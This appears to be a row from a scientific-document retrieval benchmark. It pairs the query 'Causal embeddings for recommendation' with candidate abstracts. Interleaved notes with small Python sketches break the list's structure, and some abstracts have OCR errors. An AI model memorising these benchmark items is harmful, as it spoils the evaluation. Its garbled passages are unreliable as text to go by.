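def fp_rate_bound(detector, population, weights, n_samples, delta=0.05, seed=0):
    """Estimate the weighted false-positive rate of `detector` on benign inputs
    drawn i.i.d. from `population` with probabilities proportional to `weights`,
    and return a one-sided Hoeffding bound that holds with probability 1 - delta."""
    rng = random.Random(seed)
    sample = rng.choices(population, weights=weights, k=n_samples)
    fp = sum(1 for x in sample if detector(x))          # benign inputs flagged anomalous
    estimate = fp / n_samples
    slack = math.sqrt(math.log(1.0 / delta) / (2.0 * n_samples))
    return estimate, estimate + slack

# Toy benign population with PageRank-like weights, and a toy length-based detector.
population = [f"input-{i}" for i in range(1000)]
weights = [1.0 / (i + 1) for i in range(1000)]          # heavy head, long tail
detector = lambda x: len(x) >= 9                         # flags the longer identifiers
est, bound = fp_rate_bound(detector, population, weights, n_samples=5000)
print(f"estimated FPR = {est:.3f}, holds below {bound:.3f} with probability 0.95")
```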
] | [
{
"docid": "c491e39bbfb38f256e770d730a50b2e1",
"text": "Monte Carlo integration is firmly established as the basis for most practical realistic image synthesis algorithms because of its flexibility and generality. However, the visual quality of rendered images often suffers from estimator variance, which appears as visually distracting noise. Adaptive sampling and reconstruction algorithms reduce variance by controlling the sampling density and aggregating samples in a reconstruction step, possibly over large image regions. In this paper we survey recent advances in this area. We distinguish between “a priori” methods that analyze the light transport equations and derive sampling rates and reconstruction filters from this analysis, and “a posteriori” methods that apply statistical techniques to sets of samples to drive the adaptive sampling and reconstruction process. They typically estimate the errors of several reconstruction filters, and select the best filter locally to minimize error. We discuss advantages and disadvantages of recent state-of-the-art techniques, and provide visual and quantitative comparisons. Some of these techniques are proving useful in real-world applications, and we aim to provide an overview for practitioners and researchers to assess these approaches. In addition, we discuss directions for potential further improvements.",
"title": ""
},
{
"docid": "8e6efa696b960cf08cf1616efc123cbd",
"text": "SLAM (Simultaneous Localization and Mapping) for underwater vehicles is a challenging research topic due to the limitations of underwater localization sensors and error accumulation over long-term operations. Furthermore, acoustic sensors for mapping often provide noisy and distorted images or low-resolution ranging, while video images provide highly detailed images but are often limited due to turbidity and lighting. This paper presents a review of the approaches used in state-of-the-art SLAM techniques: Extended Kalman Filter SLAM (EKF-SLAM), FastSLAM, GraphSLAM and its application in underwater environments.",
"title": ""
},
{
"docid": "da93678f1b1070d68cfcbc9b7f6f88fe",
"text": "Dermal fat grafts have been utilized in plastic surgery for both reconstructive and aesthetic purposes of the face, breast, and body. There are multiple reports in the literature on the male phallus augmentation with the use of dermal fat grafts. Few reports describe female genitalia aesthetic surgery, in particular rejuvenation of the labia majora. In this report we describe an indication and use of autologous dermal fat graft for labia majora augmentation in a patient with loss of tone and volume in the labia majora. We found that this procedure is an option for labia majora augmentation and provides a stable result in volume-restoration.",
"title": ""
},
{
"docid": "b9b08d97b084d0b73f7aba409dbda67c",
"text": "This paper presents a 1V low-voltage high speed frequency divider-by-2 which is fabricated in a standard 0.18μm TSMC RF CMOS process. Employing parallel current switching topology, the 2:1 frequency divider operates up to 6.5GHz while consuming 4.64mA current with test buffers at a supply voltage of 1V, and the chip area of the core circuit is 0.065×0.055mm2.",
"title": ""
},
{
"docid": "66d24e13c8ac0dc5c0e85b3e2873346c",
"text": "In advanced CMOS technologies, the negative bias temperature instability (NBTI) phenomenon in pMOSFETs is a major reliability concern as well as a limiting factor in future device scaling. Recently, much effort has been expended to further the basic understanding of this mechanism. This tutorial gives an overview of the physics of NBTI. Discussions include such topics as the impact of NBTI on the observed changes in the device characteristics as well as the impact of gate oxide processes on the physics of NBTI. Current experimental results, exploring various NBTI effects such as frequency dependence and relaxation, are also discussed. Since some of the recent work on the various NBTI effects seems contradictory, focus is placed on highlighting our current understanding, our open questions and our future challenges.",
"title": ""
},
{
"docid": "6bdfb1bb4afb4a7581ad26dd1f1e1089",
"text": "Currently, fuzzy controllers are the most popular choice for hardware implementation of complex control surfaces because they are easy to design. Neural controllers are more complex and hard to train, but provide an outstanding control surface with much less error than that of a fuzzy controller. There are also some problems that have to be solved before the networks can be implemented on VLSI chips. First, an approximation function needs to be developed because CMOS neural networks have an activation function different than any function used in neural network software. Next, this function has to be used to train the network. Finally, the last problem for VLSI designers is the quantization effect caused by discrete values of the channel length (L) and width (W) of MOS transistor geometries. Two neural networks were designed in 1.5 microm technology. Using adequate approximation functions solved the problem of activation function. With this approach, trained networks were characterized by very small errors. Unfortunately, when the weights were quantized, errors were increased by an order of magnitude. However, even though the errors were enlarged, the results obtained from neural network hardware implementations were superior to the results obtained with fuzzy system approach.",
"title": ""
},
{
"docid": "1b4d292a618befaa44cd8214abe46038",
"text": "The obsessive-compulsive spectrum is an important concept referring to a number of disorders drawn from several diagnostic categories that share core obsessive-compulsive features. These disorders can be grouped by the focus of their symptoms: bodily preoccupation, impulse control, or neurological disorders. Although the disorders are clearly distinct from one another, they have intriguing similarities in phenomenology, etiology, pathophysiology, patient characteristics, and treatment response. In combination with the knowledge gained through many years of research on obsessive-compulsive disorder (OCD), the concept of a spectrum has generated much fruitful research on the spectrum disorders. It has become apparent that these disorders can also be viewed as being on a continuum of compulsivity to impulsivity, characterized by harm avoidance at the compulsive end and risk seeking at the impulsive end. The compulsive and impulsive disorders differ in systematic ways that are just beginning to be understood. Here, we review these concepts and several representative obsessive-compulsive spectrum disorders including both compulsive and impulsive disorders, as well as the three different symptom clusters: OCD, body dysmorphic disorder, pathological gambling, sexual compulsivity, and autism spectrum disorders.",
"title": ""
},
{
"docid": "672fa729e41d20bdd396f9de4ead36b3",
"text": "Data that encompasses relationships is represented by a graph of interconnected nodes. Social network analysis is the study of such graphs which examines questions related to structures and patterns that can lead to the understanding of the data and predicting the trends of social networks. Static analysis, where the time of interaction is not considered (i.e., the network is frozen in time), misses the opportunity to capture the evolutionary patterns in dynamic networks. Specifically, detecting the community evolutions, the community structures that changes in time, provides insight into the underlying behaviour of the network. Recently, a number of researchers have started focusing on identifying critical events that characterize the evolution of communities in dynamic scenarios. In this paper, we present a framework for modeling and detecting community evolution in social networks, where a series of significant events is defined for each community. A community matching algorithm is also proposed to efficiently identify and track similar communities over time. We also define the concept of meta community which is a series of similar communities captured in different timeframes and detected by our matching algorithm. We illustrate the capabilities and potential of our framework by applying it to two real datasets. Furthermore, the events detected by the framework is supplemented by extraction and investigation of the topics discovered for each community. c © 2011 Published by Elsevier Ltd.",
"title": ""
},
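Note on the community-evolution passage above (docid 672fa729…): one simple way to realize the community matching it mentions is to chain communities across timeframes by member overlap (Jaccard similarity) above a threshold; the greedy rule and threshold below are illustrative choices, not the paper's exact algorithm, and each resulting chain corresponds to one meta community.

```python
def jaccard(a, b):
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if a | b else 0.0

def match_communities(snapshots, threshold=0.3):
    """Greedily chain each community to its most similar community in the next
    timeframe; a chain of matched communities forms one 'meta community'."""
    meta = [[(0, i)] for i in range(len(snapshots[0]))]
    for t in range(1, len(snapshots)):
        for chain in meta:
            last_t, last_i = chain[-1]
            if last_t != t - 1:
                continue  # this chain already dissolved in an earlier timeframe
            prev = snapshots[last_t][last_i]
            scores = [(jaccard(prev, c), j) for j, c in enumerate(snapshots[t])]
            best_score, best_j = max(scores, default=(0.0, -1))
            if best_score >= threshold:
                chain.append((t, best_j))
        # communities with no incoming match start new meta communities (birth events)
        matched = {chain[-1][1] for chain in meta if chain[-1][0] == t}
        meta.extend([[(t, j)] for j in range(len(snapshots[t])) if j not in matched])
    return meta

snapshots = [
    [{1, 2, 3, 4}, {7, 8, 9}],                 # timeframe 0
    [{1, 2, 3, 5}, {7, 8, 9, 10}, {20, 21}],   # timeframe 1: slight churn plus a birth
    [{1, 2, 5}, {20, 21, 22}],                 # timeframe 2: one community dissolves
]
for chain in match_communities(snapshots):
    print(chain)
```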
{
"docid": "c0a5ef8b48a78f5ce3cfdb6497fcba41",
"text": "Silicon photonics is a new technology that should at least enable electronics and optics to be integrated on the same optoelectronic circuit chip, leading to the production of low-cost devices on silicon wafers by using standard processes from the microelectronics industry. In order to achieve real-low-cost devices, some challenges need to be taken up concerning the integration technological process of optics with electronics and the packaging of the chip. In this paper, we review recent progress in the packaging of silicon photonic circuits from on-CMOS wafer-level integration to the single-chip package and input/output interconnects. We focus on optical fiber-coupling structures comparing edge and surface couplers. In the following, we detail optical alignment tolerances for both coupling architecture, discussing advantages and drawbacks from the packaging process point of view. Finally, we describe some achievements involving advanced-packaging techniques.",
"title": ""
},
{
"docid": "b33c7e26d3a0a8fc7fc0fb73b72840d4",
"text": "As the number of Android malicious applications has explosively increased, effectively vetting Android applications (apps) has become an emerging issue. Traditional static analysis is ineffective for vetting apps whose code have been obfuscated or encrypted. Dynamic analysis is suitable to deal with the obfuscation and encryption of codes. However, existing dynamic analysis methods cannot effectively vet the applications, as a limited number of dynamic features have been explored from apps that have become increasingly sophisticated. In this work, we propose an effective dynamic analysis method called DroidWard in the aim to extract most relevant and effective features to characterize malicious behavior and to improve the detection accuracy of malicious apps. In addition to using the existing 9 features, DroidWard extracts 6 novel types of effective features from apps through dynamic analysis. DroidWard runs apps, extracts features and identifies benign and malicious apps with Support Vector Machine (SVM), Decision Tree (DTree) and Random Forest. 666 Android apps are used in the experiments and the evaluation results show that DroidWard correctly classifies 98.54% of malicious apps with 1.55% of false positives. Compared to existing work, DroidWard improves the TPR with 16.07% and suppresses the FPR with 1.31% with SVM, indicating that it is more effective than existing methods.",
"title": ""
},
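Note on the DroidWard passage above (docid b33c7e26…): a sketch of the final classification stage only (SVM, decision tree and random forest over dynamic feature vectors, reporting TPR/FPR); the synthetic feature matrix stands in for the 15 feature types extracted from app traces, which are out of scope here.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import confusion_matrix

rng = np.random.default_rng(0)
n_apps, n_features = 666, 15                 # one column per dynamic feature type
X = rng.normal(size=(n_apps, n_features))
y = (X[:, :5].sum(axis=1) + 0.5 * rng.normal(size=n_apps) > 0).astype(int)  # 1 = malicious

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0, stratify=y)

models = {
    "SVM": SVC(kernel="rbf", C=1.0),
    "DTree": DecisionTreeClassifier(random_state=0),
    "RandomForest": RandomForestClassifier(n_estimators=100, random_state=0),
}
for name, model in models.items():
    model.fit(X_tr, y_tr)
    tn, fp, fn, tp = confusion_matrix(y_te, model.predict(X_te)).ravel()
    tpr, fpr = tp / (tp + fn), fp / (fp + tn)
    print(f"{name:>12}: TPR = {tpr:.3f}, FPR = {fpr:.3f}")
```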
{
"docid": "ab430a12088341758de5cde60ef26070",
"text": "BACKGROUND\nThe nonselective 5-HT(4) receptor agonists, cisapride and tegaserod have been associated with cardiovascular adverse events (AEs).\n\n\nAIM\nTo perform a systematic review of the safety profile, particularly cardiovascular, of 5-HT(4) agonists developed for gastrointestinal disorders, and a nonsystematic summary of their pharmacology and clinical efficacy.\n\n\nMETHODS\nArticles reporting data on cisapride, clebopride, prucalopride, mosapride, renzapride, tegaserod, TD-5108 (velusetrag) and ATI-7505 (naronapride) were identified through a systematic search of the Cochrane Library, Medline, Embase and Toxfile. Abstracts from UEGW 2006-2008 and DDW 2008-2010 were searched for these drug names, and pharmaceutical companies approached to provide unpublished data.\n\n\nRESULTS\nRetrieved articles on pharmacokinetics, human pharmacodynamics and clinical data with these 5-HT(4) agonists, are reviewed and summarised nonsystematically. Articles relating to cardiac safety and tolerability of these agents, including any relevant case reports, are reported systematically. Two nonselective 5-HT(4) agonists had reports of cardiovascular AEs: cisapride (QT prolongation) and tegaserod (ischaemia). Interactions with, respectively, the hERG cardiac potassium channel and 5-HT(1) receptor subtypes have been suggested to account for these effects. No cardiovascular safety concerns were reported for the newer, selective 5-HT(4) agonists prucalopride, velusetrag, naronapride, or for nonselective 5-HT(4) agonists with no hERG or 5-HT(1) affinity (renzapride, clebopride, mosapride).\n\n\nCONCLUSIONS\n5-HT(4) agonists for GI disorders differ in chemical structure and selectivity for 5-HT(4) receptors. Selectivity for 5-HT(4) over non-5-HT(4) receptors may influence the agent's safety and overall risk-benefit profile. Based on available evidence, highly selective 5-HT(4) agonists may offer improved safety to treat patients with impaired GI motility.",
"title": ""
},
{
"docid": "b4166b57419680e348d7a8f27fbc338a",
"text": "OBJECTIVES\nTreatments of female sexual dysfunction have been largely unsuccessful because they do not address the psychological factors that underlie female sexuality. Negative self-evaluative processes interfere with the ability to attend and register physiological changes (interoceptive awareness). This study explores the effect of mindfulness meditation training on interoceptive awareness and the three categories of known barriers to healthy sexual functioning: attention, self-judgment, and clinical symptoms.\n\n\nMETHODS\nForty-four college students (30 women) participated in either a 12-week course containing a \"meditation laboratory\" or an active control course with similar content or laboratory format. Interoceptive awareness was measured by reaction time in rating physiological response to sexual stimuli. Psychological barriers were assessed with self-reported measures of mindfulness and psychological well-being.\n\n\nRESULTS\nWomen who participated in the meditation training became significantly faster at registering their physiological responses (interoceptive awareness) to sexual stimuli compared with active controls (F(1,28) = 5.45, p = .03, η(p)(2) = 0.15). Female meditators also improved their scores on attention (t = 4.42, df = 11, p = .001), self-judgment, (t = 3.1, df = 11, p = .01), and symptoms of anxiety (t = -3.17, df = 11, p = .009) and depression (t = -2.13, df = 11, p < .05). Improvements in interoceptive awareness were correlated with improvements in the psychological barriers to healthy sexual functioning (r = -0.44 for attention, r = -0.42 for self-judgment, and r = 0.49 for anxiety; all p < .05).\n\n\nCONCLUSIONS\nMindfulness-based improvements in interoceptive awareness highlight the potential of mindfulness training as a treatment of female sexual dysfunction.",
"title": ""
},
{
"docid": "8ae986abd5f31a06d04a2762ee3bcb91",
"text": "Theta and gamma frequency oscillations occur in the same brain regions and interact with each other, a process called cross-frequency coupling. Here, we review evidence for the following hypothesis: that the dual oscillations form a code for representing multiple items in an ordered way. This form of coding has been most clearly demonstrated in the hippocampus, where different spatial information is represented in different gamma subcycles of a theta cycle. Other experiments have tested the functional importance of oscillations and their coupling. These involve correlation of oscillatory properties with memory states, correlation with memory performance, and effects of disrupting oscillations on memory. Recent work suggests that this coding scheme coordinates communication between brain regions and is involved in sensory as well as memory processes.",
"title": ""
},
{
"docid": "47b34b24dbe089ddff5f7dccce9f358a",
"text": "The use of multi-amplitude signaling schemes in wireless OFDM systems requires the tracking of the fading radio channel. This paper addresses channel estimation based on time-domain channel statistics. Using a general model for a slowly fading channel, we present the MMSE and LS estimators and a method for modifications compromising between complexity and performance. The symbol error rate for a 16-QAM system is presented by means of simulation results. Depending upon estimator complexity, up to 4 dB in SNR can be gained over the LS estimator. I . INTRODUCTION Currently, orthogonal frequency-division multiplexing (OFDM) systems [l] are subject t o significant investigation. Since this technique has been adopted in the European digital audio broadcasting (DAB) system 121, OFDM signaling in fading channel environments has gained a broad interest. For instance, its applicability to digital TV broadcasting is currently being investigated [3]. The use of differential phase-shzji! keying (DPSK) in OFDM systems avoids the tracking of a time varying channel. However, this will limit the number of bits per symbol and results in a 3 dB loss in signal-to-noise ratio (SNR) [4]. If the receiver contains a channel estimator, multiamplitude signaling schemes can be used. In [5] and [6], 16-QAM modulation in an OFDM system has been investigated. A decision-directed channeltracking method, which allows the use of multi-amplitude schemes in a slow Rayleigh-fading environment is analysed in [ 5 ] . In the design of wireless OFDM systems, the channel is usually assumed to have a finite-length impulse response. A cyclic extension, longer than this impulse response, is put between consecutive blocks in order to avoid interblock interference and preserve orthogonality of the tones [7 ] . Generally, the OFDM system is designed so that the cyclic extension is a small percentage of the total symbol length. This paper discusses channel estimation techniques in wireless OFDM systems, that use this property of the channel impulse response. Hoeher [6] and Cioffi [8] have also addressed this property. In Section 11, we describe the system model. Section I11 discusses the minimum mean-square error (MMSE) and least-squares (LS) channel estimators. The MMSE estimator has good performance but high complexity. The LS estimator has low complexity, but its performance is not as good as that of the MMSE estimator. We present modifications to both MMSE and LS estimators that use the assumption of a finite length impulse response. In Section IV we evaluate the estimators by simulating a 16-QAM signaling scheme. The performance is presented both in terms of mean-square error (MSE) and symbol error rate (SER). 11. SYSTEM DESCRIPTION We will consider the system shown in Fig. 1, where zk: are the transmitted symbols, g ( t ) is the channel impulse response, E ( t ) is the white complex Gaussian channel noise and yk are the received symbols. The transmitted symbols x k are taken from a multi-amplitude signal constellation. The D/A and A/D converters contain ideal low-pass filters with bandwidth l/Ts, where T, is the sampling interval. A cyclic extension of time length TG (not shown in Fig. I. for reasons of simplicity) is used to eliminate inter-block interference and preserve the orthogonality of the tones. 
We treat the channel impulse response g(t) as a timelimited pulse train of the form g( t ) = ams(t TmTs), (1) m where the amplitudes a, are complex valued and 0 5 T,T, 5 TG, i.e., the entire impulse response lies inside Fig. 1: Base-band OFDM system 0-7803-2742-XI95 $4.00",
"title": ""
},
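Note on the OFDM channel-estimation passage above (docid 47b34b24…): a numeric sketch of the per-tone least-squares estimate and of one simple way to exploit the finite-length impulse-response assumption (keeping only the first L time-domain taps); the channel, pilot symbols and sizes are toy values, and the truncation step is an illustration rather than the exact modification analysed in the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
N, L = 64, 8                      # tones per OFDM symbol, channel taps (<= cyclic prefix)

# Toy channel: L complex taps inside the guard interval, as in g(t) = sum_m a_m delta(t - tau_m Ts).
h = (rng.normal(size=L) + 1j * rng.normal(size=L)) * np.exp(-0.3 * np.arange(L))
H = np.fft.fft(h, N)              # true frequency response on the N tones

# Known pilot symbols (QPSK) on every tone, received through the channel plus noise.
X = np.exp(1j * (np.pi / 4 + np.pi / 2 * rng.integers(0, 4, size=N)))
noise = 0.05 * (rng.normal(size=N) + 1j * rng.normal(size=N))
Y = H * X + noise

# Per-tone least-squares estimate: H_ls[k] = Y[k] / X[k].
H_ls = Y / X

# Truncated-impulse-response modification: go to the time domain, keep only the
# first L taps (the response cannot be longer than the cyclic prefix), go back.
h_hat = np.fft.ifft(H_ls)
h_hat[L:] = 0.0
H_trunc = np.fft.fft(h_hat)

mse = lambda A, B: float(np.mean(np.abs(A - B) ** 2))
print("LS estimator MSE:        ", mse(H_ls, H))
print("truncated-IR estimator:  ", mse(H_trunc, H))
```

Discarding the taps beyond the cyclic-prefix length removes most of the noise energy, which is why this kind of low-complexity modification can close part of the gap to the MMSE estimator.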
{
"docid": "c77c6ea404d9d834ef1be5a1d7222e66",
"text": "We introduce the concepts of regular and totally regular bipolar fuzzy graphs. We prove necessary and sufficient condition under which regular bipolar fuzzy graph and totally bipolar fuzzy graph are equivalent. We introduce the notion of bipolar fuzzy line graphs and present some of their properties. We state a necessary and sufficient condition for a bipolar fuzzy graph to be isomorphic to its corresponding bipolar fuzzy line graph. We examine when an isomorphism between two bipolar fuzzy graphs follows from an isomorphism of their corresponding bipolar fuzzy line graphs.",
"title": ""
},
{
"docid": "d4cd0dabcf4caa22ad92fab40844c786",
"text": "NA",
"title": ""
},
{
"docid": "e152424ca6785ddf034334f56cee4535",
"text": "I t is clear that the temi social marketing is now a wellestablished part of the marketing vocabulary in universities, govemmetit agencies, private nonprofit organizations, and private for-profit firms. There are now social marketing textbooks (Kotler and Roberto 1989; Manoff 1975), readings books (Fine 1990), chapters within mainstream texts (Kotler and Andreasen 1991) and a Harvard teaching note (Rangun and Karim 1991). There have been reviews ofthe accomplishments of social marketing (Fox and Kotler 1980; Malafarina and Loken 1993) and calls to researchers to become more deeply involved in studies of social marketing to advance the science of marketing (Andreasen 1993). Major international and domestic behavior change programs now routinely have social marketing components (Debus 1987; Ramah 1992; Smith 1989). People with titles like Manager of Social Marketing now can be found in private consulting organizations.",
"title": ""
},
{
"docid": "bca70006889b6d4186b522b9edd4b032",
"text": "Native advertising is a specific form of online advertising where ads replicate the look-and-feel of their serving platform. In such context, providing a good user experience with the served ads is crucial to ensure long-term user engagement. In this work, we explore the notion of ad quality, namely the effectiveness of advertising from a user experience perspective. We design a learning framework to predict the pre-click quality of native ads. More specifically, we look at detecting offensive native ads, showing that, to quantify ad quality, ad offensive user feedback rates are more reliable than the commonly used click-through rate metrics. We then conduct a crowd-sourcing study to identify which criteria drive user preferences in native advertising. We translate these criteria into a set of ad quality features that we extract from the ad text, image and advertiser, and then use them to train a model able to identify offensive ads. We show that our model is very effective in detecting offensive ads, and provide in-depth insights on how different features affect ad quality. Finally, we deploy a preliminary version of such model and show its effectiveness in the reduction of the offensive ad feedback rate.",
"title": ""
},
{
"docid": "0b3ed0ce26999cb6188fb0c88eb483ab",
"text": "We consider the problem of learning causal networks with int erventions, when each intervention is limited in size under Pearl’s Structural Equation Model with independent e rrors (SEM-IE). The objective is to minimize the number of experiments to discover the causal directions of all the e dges in a causal graph. Previous work has focused on the use of separating systems for complete graphs for this task. We prove that any deterministic adaptive algorithm needs to be a separating system in order to learn complete graphs in t e worst case. In addition, we present a novel separating system construction, whose size is close to optimal and is ar guably simpler than previous work in combinatorics. We also develop a novel information theoretic lower bound on th e number of interventions that applies in full generality, including for randomized adaptive learning algorithms. For general chordal graphs, we derive worst case lower bound s o the number of interventions. Building on observations about induced trees, we give a new determinist ic adaptive algorithm to learn directions on any chordal skeleton completely. In the worst case, our achievable sche me is anα-approximation algorithm where α is the independence number of the graph. We also show that there exi st graph classes for which the sufficient number of experiments is close to the lower bound. In the other extreme , there are graph classes for which the required number of experiments is multiplicativelyα away from our lower bound. In simulations, our algorithm almost always performs very c lose to the lower bound, while the approach based on separating systems for complete graphs is significantly wor se for random chordal graphs.",
"title": ""
},
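Note on the causal-intervention passage above (docid 0b3ed0ce…): the classic separating-system construction labels the vertices with binary codes and, in experiment i, intervenes on every vertex whose i-th bit is 1; the sketch below implements that textbook construction and checks the separating property, while ignoring the bound on intervention size that the paper also handles with its own refined construction.

```python
from math import ceil, log2

def separating_experiments(n):
    """Classic separating-system construction (no bound on intervention size):
    experiment i intervenes on every vertex whose i-th bit is 1.  Any two
    distinct vertices differ in some bit, so some experiment contains exactly
    one of them, which is enough to orient the edge between them."""
    m = max(1, ceil(log2(n)))
    return [{v for v in range(n) if (v >> i) & 1} for i in range(m)]

def is_separating(experiments, n):
    for u in range(n):
        for v in range(u + 1, n):
            if not any((u in e) != (v in e) for e in experiments):
                return False
    return True

n = 10
exps = separating_experiments(n)
print(f"{len(exps)} experiments for {n} vertices:")
for e in exps:
    print(sorted(e))
print("separating:", is_separating(exps, n))
```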
{
"docid": "ef779863c1ca2e8eab8198b5a8ebb503",
"text": "Due to the ongoing debate regarding the definitions and measurement of cyberbullying, the present article critically appraises the existing literature and offers direction regarding the question of how best to conceptualise peer-to-peer abuse in a cyber context. Variations across definitions are problematic as it has been argued that inconsistencies with regard to definitions result in researchers examining different phenomena, whilst the absence of an agreed conceptualisation of the behaviour(s) involved hinders the development of reliable and valid measures. Existing definitions of cyberbullying often incorporate the criteria of traditional bullying such as intent to harm, repetition, and imbalance of power. However, due to the unique nature of cyber-based communication, it can be difficult to identify such criteria in relation to cyber-based abuse. Thus, for these reasons cyberbullying may not be the most appropriate term. Rather than attempting to “shoe-horn” this abusive behaviour into the preconceived conceptual framework that provides an understanding of traditional bullying, it is timely to take an alternative approach. We argue that it is now time to turn our attention to the broader issue of cyber aggression, rather than persist with the narrow focus that is cyberbullying.",
"title": ""
}
] | scidocsrr |
d87c0a24f541c17541c1fda529657c5c | Causal embeddings for recommendation | [
{
"docid": "6b88e1cc20825b2df971f5cddff0d72f",
"text": "When a new treatment is considered for use, whether a pharmaceutical drug or a search engine ranking algorithm, a typical question that arises is, will its performance exceed that of the current treatment? The conventional way to answer this counterfactual question is to estimate the effect of the new treatment in comparison to that of the conventional treatment by running a controlled, randomized experiment. While this approach theoretically ensures an unbiased estimator, it suffers from several drawbacks, including the difficulty in finding representative experimental populations as well as the cost of running randomized trials. Moreover, such trials neglect the huge quantities of available controlcondition data, which in principle can be utilized for the harder task of predicting individualized effects. In this paper we propose a discriminative framework for predicting the outcomes of a new treatment from a large dataset of the control condition and data from a small (and possibly unrepresentative) randomized trial comparing new and old treatments. Our learning objective, which requires minimal assumptions on the treatments, models the relation between the outcomes of the different conditions. This allows us to not only estimate mean effects but also to generate individual predictions for examples outside the small randomized sample. We demonstrate the utility of our approach through experiments in three areas: search engine operation, treatments to diabetes patients, and market value estimation of houses. Our results demonstrate that our approach can reduce the number and size of the currently performed randomized controlled experiments, thus saving significant time, money and effort on the part of practitioners.",
"title": ""
}
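Note on the passage above (docid 6b88e1cc…): a toy rendering of the two-stage idea it describes, fitting an outcome model on the large control log and then using the small randomized trial to learn a relation between predicted control outcomes and observed treated outcomes; the models, synthetic data and outcome functions are placeholders, not the paper's framework.

```python
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.linear_model import LinearRegression

rng = np.random.default_rng(0)

def control_outcome(x):      # unknown response under the current treatment
    return x[:, 0] + 0.5 * np.sin(3 * x[:, 1])

def treated_outcome(x):      # unknown response under the new treatment
    return 1.2 * control_outcome(x) + 0.3

# Large log of the control condition, small randomized trial of the new treatment.
X_ctrl = rng.normal(size=(5000, 2))
y_ctrl = control_outcome(X_ctrl) + 0.1 * rng.normal(size=5000)
X_rct = rng.normal(size=(100, 2))
y_rct_treated = treated_outcome(X_rct) + 0.1 * rng.normal(size=100)

# Step 1: outcome model for the control condition from plentiful control data.
f_ctrl = GradientBoostingRegressor(random_state=0).fit(X_ctrl, y_ctrl)

# Step 2: on the small trial, relate predicted control outcomes to observed
# treated outcomes; this captures the treatment's effect as a mapping.
g = LinearRegression().fit(f_ctrl.predict(X_rct).reshape(-1, 1), y_rct_treated)

# Individualized predictions under the new treatment for fresh examples.
X_new = rng.normal(size=(5, 2))
y_hat = g.predict(f_ctrl.predict(X_new).reshape(-1, 1))
print(np.round(y_hat, 3))
print(np.round(treated_outcome(X_new), 3))   # ground truth for comparison
```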
] | [
{
"docid": "fb6ed16b64cb3246e6670fd718bda819",
"text": "There are various premier software packages available in the market, either for free use or found at a high price, to analyse the century old electrical power system. Universities in the developed countries expend thousands of dollars per year to bring these commercial applications to the desktops of students, teachers and researchers. For teachers and researchers this is regarded as a good long-term investment. As well, for the postgraduate students these packages are very important to validate the model developed during course of study. For simulating different test cases and/or standard systems, which are readily available with these widely used commercial software packages, such enriched software plays an important role. But in case of underdeveloped and developing countries the high amount of money needed to be expended per year to purchase commercial software is a farfetched idea. In addition, undergraduate students who are learning power system for the very first time find these packages incongruous for them since they are not familiar with the detailed input required to run the program. Even if it is a simple load flow program to find the steady-state behaviour of the system, or an elementary symmetrical fault analysis test case these packages require numerous inputs since they mimic a practical power system rather than considering simple test cases. In effect, undergraduate students tend to stay away from these packages. So rather than aiding the study in power system, these create a bad impression on students‘ mind about the very much interesting course.",
"title": ""
},
{
"docid": "03371f6200ebf2bdf0807e41a998550c",
"text": "As next-generation sequencing projects generate massive genome-wide sequence variation data, bioinformatics tools are being developed to provide computational predictions on the functional effects of sequence variations and narrow down the search of casual variants for disease phenotypes. Different classes of sequence variations at the nucleotide level are involved in human diseases, including substitutions, insertions, deletions, frameshifts, and non-sense mutations. Frameshifts and non-sense mutations are likely to cause a negative effect on protein function. Existing prediction tools primarily focus on studying the deleterious effects of single amino acid substitutions through examining amino acid conservation at the position of interest among related sequences, an approach that is not directly applicable to insertions or deletions. Here, we introduce a versatile alignment-based score as a new metric to predict the damaging effects of variations not limited to single amino acid substitutions but also in-frame insertions, deletions, and multiple amino acid substitutions. This alignment-based score measures the change in sequence similarity of a query sequence to a protein sequence homolog before and after the introduction of an amino acid variation to the query sequence. Our results showed that the scoring scheme performs well in separating disease-associated variants (n = 21,662) from common polymorphisms (n = 37,022) for UniProt human protein variations, and also in separating deleterious variants (n = 15,179) from neutral variants (n = 17,891) for UniProt non-human protein variations. In our approach, the area under the receiver operating characteristic curve (AUC) for the human and non-human protein variation datasets is ∼0.85. We also observed that the alignment-based score correlates with the deleteriousness of a sequence variation. In summary, we have developed a new algorithm, PROVEAN (Protein Variation Effect Analyzer), which provides a generalized approach to predict the functional effects of protein sequence variations including single or multiple amino acid substitutions, and in-frame insertions and deletions. The PROVEAN tool is available online at http://provean.jcvi.org.",
"title": ""
},
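Note on the PROVEAN passage above (docid 03371f62…): the alignment-based delta score compares the query-to-homolog alignment score before and after introducing a variant; the sketch uses a small Needleman–Wunsch scorer with crude match/mismatch/gap values in place of the substitution matrices and homolog sets the real tool uses, so the numbers are only illustrative.

```python
def nw_score(a, b, match=2, mismatch=-1, gap=-2):
    """Needleman-Wunsch global alignment score (score only, not the alignment)."""
    prev = [j * gap for j in range(len(b) + 1)]
    for i in range(1, len(a) + 1):
        cur = [i * gap] + [0] * len(b)
        for j in range(1, len(b) + 1):
            diag = prev[j - 1] + (match if a[i - 1] == b[j - 1] else mismatch)
            cur[j] = max(diag, prev[j] + gap, cur[j - 1] + gap)
        prev = cur
    return prev[-1]

def delta_score(query, variant, homolog):
    """PROVEAN-style delta: similarity of the variant to the homolog minus the
    similarity of the reference query; strongly negative deltas suggest a
    damaging variation (thresholds here are purely illustrative)."""
    return nw_score(variant, homolog) - nw_score(query, homolog)

ref      = "MKTAYIAKQRQISFVKSHFSRQLEERLGLIEVQ"
homolog  = "MKTAYIAKQRQISFVKSHFSRQLEERLGIIEVQ"
sub      = ref[:10] + "W" + ref[11:]        # single amino acid substitution
deletion = ref[:10] + ref[13:]              # in-frame deletion of three residues
print("substitution delta:", delta_score(ref, sub, homolog))
print("deletion delta:    ", delta_score(ref, deletion, homolog))
```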
{
"docid": "02a130ee46349366f2df347119831e5c",
